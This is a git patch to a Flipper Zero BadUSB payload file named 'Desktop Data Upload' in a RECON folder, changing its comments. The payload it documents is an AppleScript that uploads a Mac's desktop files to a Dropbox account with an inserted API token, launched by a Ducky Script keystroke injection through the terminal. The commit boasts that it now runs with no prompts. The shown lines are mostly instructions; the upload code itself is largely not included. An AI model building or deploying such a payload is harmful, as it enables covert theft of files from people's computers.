From b3adb3d290a3de9bf9d35254e230b4c445cb17ff Mon Sep 17 00:00:00 2001 From: Narsty Date: Tue, 23 May 2023 00:09:17 -0500 Subject: [PATCH] Update Desktop Data Upload.txt cleaned up the code Runs with no prompts now! --- RECON/Desktop Data Upload.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/RECON/Desktop Data Upload.txt b/RECON/Desktop Data Upload.txt index dcdd9c1..1c2e2b2 100644 --- a/RECON/Desktop Data Upload.txt +++ b/RECON/Desktop Data Upload.txt @@ -4,9 +4,9 @@ REM Author: Narsty REM Title: Desktop Data Upload REM Version 1.0 MacOs -REM Copy and paste this osascript/code into the Script editor App on your MacOs +REM Copy and paste this osascript/code (lines 12-31) into the Script editor App on your MacOs REM Replace the "Your API Access token Here" placeholder with your actual Dropbox API token. line 13 -REM Save this script below as DTDUpload.scpt file (you can use Script Editor) to your desktop. +REM Save this script below as DTDUpload.scpt file (Use Script Editor) to your desktop. set desktopPath to POSIX path of (path to desktop folder) @@ -34,8 +34,8 @@ end repeat REM Title: Desktop Data Upload Execution Script REM Version 1.0 MacOs -REM Save the below Ducky Script as a .txt file (main Read.me has step by step directions) -REM and put the .txt on your flipper zero to execute the osascript through the terminal. +REM Save the below Ducky Script as a .txt file lines 41-54 (main Read.me has step by step directions) +REM and put the .txt file on your BADUSB flipper zero APP to execute the osascript through the terminal. DELAY 500